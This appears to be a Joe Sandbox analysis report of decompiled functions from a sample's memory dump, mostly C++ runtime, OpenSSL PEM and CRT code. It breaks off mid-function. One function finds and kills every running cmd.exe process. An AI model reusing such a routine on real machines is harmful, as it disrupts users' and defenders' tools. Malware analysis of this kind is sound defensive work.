String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0044F26C(void* __eflags, char _a4) {
				char _v16;
				char _v24;
				char _v44;
				intOrPtr _v52;
				char _v76;
				char _v84;
				char _v104;
				void* _t50;
				void* _t51;

				_t51 = _t50 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6560;
				E00430ECA( &_v16, 0x508238);
				asm("int3");
				_push(_t50);
				E00430CFC( &_v44,  &_v24);
				_v44 = 0x4d6578;
				E00430ECA( &_v44, 0x508274);
				asm("int3");
				_push(_t51);
				E0044EF74( &_v76, _v52);
				E00430ECA( &_v76, 0x508320);
				asm("int3");
				_push(_t51 - 0xc);
				E00430CFC( &_v104,  &_v84);
				_v104 = 0x4d656c;
				E00430ECA( &_v104, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00412440() {
				char _v524;
				long _v552;
				void* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct tagPROCESSENTRY32W* _t7;
				int _t10;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t20;

				_t17 = CreateToolhelp32Snapshot(0xf, 0);
				_v560 = 0x22c;
				_t7 =  &_v560;
				Process32FirstW(_t17, _t7);
				_t16 = CloseHandle;
				if(_t7 == 0) {
					L7:
					return CloseHandle(_t17);
				}
				_push(_t18);
				do {
					_t10 = E00420235(_t16, _t17, _t18,  &_v524, L"cmd.exe");
					_t20 = _t20 + 8;
					if(_t10 == 0) {
						_t18 = OpenProcess(1, _t10, _v552);
						if(_t18 != 0) {
							TerminateProcess(_t18, 9);
							CloseHandle(_t18);
						}
					}
				} while (Process32NextW(_t17,  &_v560) != 0);
				goto L7;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0041244F
Process32FirstW.KERNEL32 ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32 ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040CBA0(intOrPtr* __ecx, void* __eflags, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v1124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t127;
				intOrPtr _t129;
				void* _t150;
				void* _t172;
				void* _t173;
				void* _t176;
				void* _t178;
				intOrPtr _t179;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t189;
				void* _t191;

				_push(0xffffffff);
				_push(E004CA818);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t179;
				_push(_t150);
				_push(_t172);
				_v100 = __ecx;
				_push(0xffffffff);
				_v8 = 1;
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				E00413FF0(_t150,  &_v92,  &_a28, 0);
				_v8 = 2;
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "\n");
				_v8 = 3;
				_push(3);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\\\n");
				_v8 = 4;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t181 = _t179 - 0x458 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t181 = _t181 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t181 = _t181 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, " ");
				_v8 = 5;
				_push(6);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "&#160;");
				_v8 = 6;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t182 = _t181 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t182 = _t182 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t182 = _t182 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "/");
				_v8 = 7;
				_push(2);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\/");
				_v8 = 8;
				_t171 =  &_v44;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t183 = _t182 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t183 = _t183 + 4;
				}
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t183 = _t183 + 4;
				}
				_v20 = E00451D30();
				E0044F960(_t150, _t171, E00452510());
				_t120 =  >=  ? _v92 :  &_v92;
				_t151 = E004524A0(_t178,  >=  ? _v92 :  &_v92, _v76);
				E00452ED0(_t121,  &_v20, 0, 0);
				_t185 = _t183 + 0x1c;
				if(E00450960(_t151, _t171, _v72 - 0x10) == 0) {
					_t176 = E00420C62(_t151, _t171, _t172, E004527A0(_t171, __eflags, _v20));
					_t127 = E00420C62(_t151, _t171, _t172, 0x82);
					__eflags = _a24 - 0x10;
					_t173 = _t127;
					_t165 =  >=  ? _a4 :  &_a4;
					_t129 = _a20 + 1;
					_push(4);
					_push(_v20);
					_push(_t176);
					_push( >=  ? _a4 :  &_a4);
					E004525F0(_t129);
					_t189 = _t185 + 0x20;
					_v96 = _t129;
					__eflags = _t129 - 0xffffffff;
					if(_t129 != 0xffffffff) {
						E0044F5E0(_t151);
						E00451A60(_t171, _t178, _v20);
						_t191 = _t189 + 8;
						 *_v100 = _v96;
					} else {
						E00451FB0(_t151, _t173);
						E00450670(E00450960(_t151, _t171, __eflags), _t173);
						_push(_t173);
						_push("Error encrypting message: %s\n");
						_push(E00420E4D() + 0x40);
						E00422408(_t151, _t173, _t176, __eflags);
						_t191 = _t189 + 0x14;
						_t176 = 0;
					}
				} else {
					E00450670(_t124,  &_v1124);
					_t191 = _t185 + 8;
					_t176 = 0;
				}
				if(_v72 >= 0x10) {
					L00422587(_v92);
					_t191 = _t191 + 4;
				}
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				if(_a24 >= 0x10) {
					L00422587(_a4);
					_t191 = _t191 + 4;
				}
				_a24 = 0xf;
				_a20 = 0;
				_a4 = 0;
				if(_a48 >= 0x10) {
					L00422587(_a28);
				}
				 *[fs:0x0] = _v16;
				return _t176;
			}

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

Error encrypting message: %s, xrefs: 0040CE67
\\n, xrefs: 0040CC1B
 , xrefs: 0040CCAF

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: 8cedc797476402b5fb366602ae38366f425c4ee5d90d53b93b2969e3f3d1c6b7
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: 8cedc797476402b5fb366602ae38366f425c4ee5d90d53b93b2969e3f3d1c6b7
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00463350(void* __ebx, void* __edx, void* __ebp, char _a4, intOrPtr* _a8) {
				void* __edi;
				intOrPtr _t12;
				void* _t13;
				char _t16;
				intOrPtr _t19;
				signed int _t22;
				char _t35;
				void* _t36;
				char* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t40;
				char* _t41;
				void* _t42;
				char* _t43;

				_t45 = __ebp;
				_t38 = __edx;
				_t34 = __ebx;
				_t40 = _a4;
				_t39 = _a8;
				 *_t39 = 0;
				if(_t40 == 0) {
					L26:
					return 1;
				} else {
					_t12 =  *_t40;
					if(_t12 == 0 || _t12 == 0xa) {
						goto L26;
					} else {
						_t13 = E00448190(_t40, "Proc-Type: ", 0xb);
						_t60 = _t13;
						if(_t13 == 0) {
							__eflags =  *((char*)(_t40 + 0xb)) - 0x34;
							if( *((char*)(_t40 + 0xb)) != 0x34) {
								goto L5;
							} else {
								__eflags =  *((char*)(_t40 + 0xc)) - 0x2c;
								if( *((char*)(_t40 + 0xc)) != 0x2c) {
									goto L5;
								} else {
									_t41 = _t40 + 0xd;
									__eflags = E00448190(_t41, "ENCRYPTED", 9);
									if(__eflags == 0) {
										_t16 =  *_t41;
										__eflags = _t16 - 0xa;
										if(_t16 == 0xa) {
											L13:
											__eflags =  *_t41;
											if(__eflags != 0) {
												_t42 = _t41 + 1;
												__eflags = E00448190(_t42, "DEK-Info: ", 0xa);
												if(__eflags == 0) {
													_t43 = _t42 + 0xa;
													__eflags = _t43;
													_t37 = _t43;
													_push(_t34);
													while(1) {
														_t35 =  *_t43;
														__eflags = _t35 - 0x41;
														if(_t35 < 0x41) {
															goto L20;
														}
														__eflags = _t35 - 0x5a;
														if(_t35 <= 0x5a) {
															L22:
															_t43 = _t43 + 1;
															continue;
														}
														L20:
														__eflags = _t35 - 0x2d;
														if(_t35 == 0x2d) {
															goto L22;
														}
														_t6 = _t35 - 0x30; // -48
														__eflags = _t6 - 9;
														if(_t6 <= 9) {
															goto L22;
														}
														 *_t43 = 0;
														_t19 = E0047ECD0(_t37);
														 *_t39 = _t19;
														 *_t43 = _t35;
														_a4 = _t43 + 1;
														_pop(_t36);
														__eflags = _t19;
														if(__eflags != 0) {
															_t22 = E00464360( &_a4, _t39 + 4,  *((intOrPtr*)(_t19 + 0xc)));
															asm("sbb eax, eax");
															return  ~( ~_t22);
														} else {
															E004512D0(_t36, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x72, ".\\crypto\\pem\\pem_lib.c", 0x219);
															__eflags = 0;
															return 0;
														}
														goto L27;
													}
												} else {
													E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x69, ".\\crypto\\pem\\pem_lib.c", 0x200);
													__eflags = 0;
													return 0;
												}
											} else {
												goto L14;
											}
										} else {
											while(1) {
												__eflags = _t16;
												if(__eflags == 0) {
													break;
												}
												_t16 =  *((intOrPtr*)(_t41 + 1));
												_t41 = _t41 + 1;
												__eflags = _t16 - 0xa;
												if(_t16 != 0xa) {
													continue;
												} else {
													goto L13;
												}
												goto L27;
											}
											L14:
											E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x70, ".\\crypto\\pem\\pem_lib.c", 0x1fd);
											__eflags = 0;
											return 0;
										}
									} else {
										E004512D0(__ebx, _t38, _t39, __ebp, __eflags, 9, 0x6b, 0x6a, ".\\crypto\\pem\\pem_lib.c", 0x1f9);
										__eflags = 0;
										return 0;
									}
								}
							}
						} else {
							E004512D0(__ebx, _t38, _t39, __ebp, _t60, 9, 0x6b, 0x6b, ".\\crypto\\pem\\pem_lib.c", 0x1f4);
							L5:
							return 0;
						}
					}
				}
				L27:
			}

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

ENCRYPTED, xrefs: 004633BC
DEK-Info: , xrefs: 00463422
Proc-Type: , xrefs: 0046337C
.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Uniqueness

Uniqueness Score: -1.00%

Function 004C5D39 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004C5D39(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v32;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t32;
				signed int* _t34;
				signed int _t36;
				signed int _t42;
				signed int _t47;
				char* _t48;
				signed int _t49;
				signed int _t52;
				unsigned int _t58;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t66;
				signed int _t73;
				void* _t78;
				char* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				void* _t89;
				void* _t93;

				_t63 = __edx;
				_t89 = _t93;
				_t78 = E0042501F(__ebx);
				if(_t78 != 0) {
					_push(__ebx);
					__eflags =  *(_t78 + 0x24);
					if( *(_t78 + 0x24) != 0) {
						L7:
						_t79 =  *(_t78 + 0x24);
						_t32 = E0042C0FD(_t79, 0x86, E004C5D13(_a4));
						__eflags = _t32;
						if(_t32 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E004242FD(0x86, _t63);
							asm("int3");
							_push(_t89);
							__eflags = _v32;
							_push(_t79);
							if(__eflags != 0) {
								_t80 = _v16;
								__eflags = _t80;
								if(__eflags == 0) {
									goto L10;
								} else {
									_t7 = _t80 - 1; // -1
									_t36 = E0043FF8E(_v20, _t80, E004C5D13(_v12), _t7);
									__eflags = _t36;
									if(_t36 == 0) {
										goto L11;
									} else {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E004242FD(0x86, _t63);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t58 = _v52;
										_push(0);
										__eflags = _t58;
										if(_t58 == 0) {
											L34:
											return _v60;
										} else {
											_push(_t80);
											_push(0x86);
											_t52 = _t58;
											_t83 = _v56;
											__eflags = _t83 & 0x00000003;
											_t73 = _v60;
											if((_t83 & 0x00000003) != 0) {
												while(1) {
													_t42 =  *_t83;
													_t83 = _t83 + 1;
													 *_t73 = _t42;
													_t73 = _t73 + 1;
													_t58 = _t58 - 1;
													__eflags = _t58;
													if(_t58 == 0) {
														goto L26;
													}
													__eflags = _t42;
													if(_t42 == 0) {
														__eflags = _t73 & 0x00000003;
														if((_t73 & 0x00000003) == 0) {
															L30:
															_t52 = _t58;
															_t59 = _t58 >> 2;
															__eflags = _t59;
															if(_t59 != 0) {
																goto L46;
															} else {
																goto L31;
															}
														} else {
															while(1) {
																 *_t73 = _t42;
																_t73 = _t73 + 1;
																_t58 = _t58 - 1;
																__eflags = _t58;
																if(_t58 == 0) {
																	goto L49;
																}
																__eflags = _t73 & 0x00000003;
																if((_t73 & 0x00000003) != 0) {
																	continue;
																} else {
																	goto L30;
																}
																goto L50;
															}
															goto L49;
														}
													} else {
														__eflags = _t83 & 0x00000003;
														if((_t83 & 0x00000003) != 0) {
															continue;
														} else {
															_t52 = _t58;
															_t60 = _t58 >> 2;
															__eflags = _t60;
															if(_t60 != 0) {
																goto L36;
															} else {
																goto L23;
															}
														}
													}
													goto L50;
												}
												goto L26;
											} else {
												_t60 = _t58 >> 2;
												__eflags = _t60;
												if(_t60 != 0) {
													do {
														L36:
														_t47 =  *_t83 ^ 0xffffffff ^ 0x7efefeff +  *_t83;
														_t66 =  *_t83;
														_t83 = _t83 + 4;
														__eflags = _t47 & 0x81010100;
														if((_t47 & 0x81010100) == 0) {
															goto L35;
														} else {
															__eflags = _t66;
															if(_t66 == 0) {
																__eflags = 0;
																 *_t73 = 0;
																goto L45;
															} else {
																__eflags = _t66;
																if(_t66 == 0) {
																	 *_t73 = _t66 & 0x000000ff;
																	goto L45;
																} else {
																	__eflags = _t66 & 0x00ff0000;
																	if((_t66 & 0x00ff0000) == 0) {
																		 *_t73 = _t66 & 0x0000ffff;
																		goto L45;
																	} else {
																		__eflags = _t66 & 0xff000000;
																		if((_t66 & 0xff000000) != 0) {
																			goto L35;
																		} else {
																			 *_t73 = _t66;
																			L45:
																			_t73 = _t73 + 4;
																			_t42 = 0;
																			_t59 = _t60 - 1;
																			__eflags = _t59;
																			if(_t59 != 0) {
																				L46:
																				_t42 = 0;
																				__eflags = 0;
																				do {
																					 *_t73 = 0;
																					_t73 = _t73 + 4;
																					_t59 = _t59 - 1;
																					__eflags = _t59;
																				} while (_t59 != 0);
																			}
																			_t52 = _t52 & 0x00000003;
																			__eflags = _t52;
																			if(_t52 != 0) {
																				goto L31;
																			} else {
																				L49:
																				return _v60;
																			}
																		}
																	}
																}
															}
														}
														goto L50;
														L35:
														 *_t73 = _t66;
														_t73 = _t73 + 4;
														_t60 = _t60 - 1;
														__eflags = _t60;
													} while (_t60 != 0);
													L23:
													_t52 = _t52 & 0x00000003;
													__eflags = _t52;
													if(_t52 == 0) {
														goto L26;
													} else {
														goto L24;
													}
												} else {
													while(1) {
														L24:
														_t42 =  *_t83;
														_t83 = _t83 + 1;
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t42;
														if(_t42 == 0) {
															break;
														}
														_t52 = _t52 - 1;
														__eflags = _t52;
														if(_t52 != 0) {
															continue;
														} else {
															L26:
															return _v60;
														}
														goto L50;
													}
													L32:
													_t52 = _t52 - 1;
													__eflags = _t52;
													if(_t52 != 0) {
														L31:
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t73;
														goto L32;
													}
													goto L34;
												}
											}
										}
									}
								}
							} else {
								L10:
								_t34 = E00425208(__eflags);
								_t81 = 0x16;
								 *_t34 = _t81;
								E004242D2();
								_t36 = _t81;
								L11:
								return _t36;
							}
						} else {
							_t48 = _t79;
							goto L5;
						}
					} else {
						_t49 = E00428C96(0x86, 1);
						 *(_t78 + 0x24) = _t49;
						__eflags = _t49;
						if(_t49 != 0) {
							goto L7;
						} else {
							_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t48;
				}
				L50:
			}

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(00000001,00000000,0042520D,00420CE9,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__invoke_watson.LIBCMT ref: 004C5D9B
__get_sys_err_msg.LIBCMT ref: 004C5DCD
__invoke_watson.LIBCMT ref: 004C5DEB

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 2139067377-798102604
Opcode ID: 6565f3eeb2dc9c0597fd8b1228d76a5755e5e4a7eea90c3f78218ec856ed93f0
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 6565f3eeb2dc9c0597fd8b1228d76a5755e5e4a7eea90c3f78218ec856ed93f0
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Uniqueness

Uniqueness Score: -1.00%

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E004573F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, char _a28, signed int _a60, intOrPtr _a68, char _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, intOrPtr _a92, signed int _a96, intOrPtr _a100, signed char _a104) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t129;
				intOrPtr _t135;
				signed int _t136;
				signed int _t140;
				void* _t141;
				signed int _t143;
				signed int _t148;
				void* _t150;
				intOrPtr _t154;
				signed char _t160;
				char _t166;
				intOrPtr _t170;
				signed int _t174;
				signed int _t181;
				signed int* _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t187;
				signed char _t189;
				signed int _t192;
				signed int* _t196;
				signed int _t199;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				void* _t208;
				intOrPtr _t209;
				signed int _t213;
				intOrPtr _t214;
				intOrPtr* _t217;
				signed int _t220;
				signed int _t221;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t231;
				intOrPtr* _t232;
				signed int* _t233;
				void* _t235;
				signed int _t240;
				void* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr _t249;
				intOrPtr _t250;
				signed int _t253;
				signed int _t257;
				void* _t262;
				signed char _t268;

				E0042F7C0(0x40);
				_t129 =  *0x50ad20; // 0xa4c21a8c
				_a60 = _t129 ^ _t253;
				_t187 = _a100;
				_t181 = _a84;
				_t249 = _a68;
				_a28 = _a72;
				_a8 = _a76;
				_v0 = _a80;
				_t220 = 0;
				_a4 = 0x4ffca4;
				_a12 = 0;
				_t188 =  <  ? 0 : _t187;
				_t213 = _a88;
				_a100 =  <  ? 0 : _t187;
				_t189 = _a104;
				if((_t189 & 0x00000040) == 0) {
					_t257 = _t213;
					if(_t257 > 0 || _t257 >= 0 && _t181 >= 0) {
						__eflags = _t189 & 0x00000002;
						if((_t189 & 0x00000002) == 0) {
							__eflags = _t189 & 0x00000004;
							_a16 = 0x20;
							_t179 =  !=  ? _a16 : 0;
							_a12 =  !=  ? _a16 : 0;
						} else {
							_a12 = 0x2b;
						}
					} else {
						_t181 =  ~_t181;
						_a12 = 0x2d;
						asm("adc edx, eax");
						_t213 =  ~_t213;
					}
				}
				_t135 = _a92;
				if((_t189 & 0x00000008) != 0) {
					if(_t135 != 8) {
						__eflags = _a92 - 0x10;
						_t178 =  !=  ? 0x4ffca4 : "0x";
						_a4 =  !=  ? 0x4ffca4 : "0x";
						_t135 = _a92;
					} else {
						_a4 = "0";
					}
				}
				_a16 = "0123456789abcdef";
				_t230 =  !=  ? 1 : _t220;
				_t262 =  !=  ? 1 : _t220;
				_t192 =  ==  ? _a16 : "0123456789ABCDEF";
				_t231 = _t192;
				while(1) {
					_t136 = E0043AE20(_t181, _t213, _t135, 0);
					_a4 = _t181;
					_t181 = _t136;
					 *((char*)(_t253 + _t220 + 0x30)) =  *((intOrPtr*)(_t192 + _t231));
					_t220 = _t220 + 1;
					_t192 = _t181 | _t213;
					if(_t192 == 0) {
						break;
					}
					_t135 = _a92;
					if(_t220 < 0x1a) {
						continue;
					}
					break;
				}
				_t232 = _a4;
				_a16 = _t220;
				if(_t220 != 0x1a) {
					if(__eflags >= 0) {
						E0042AC83();
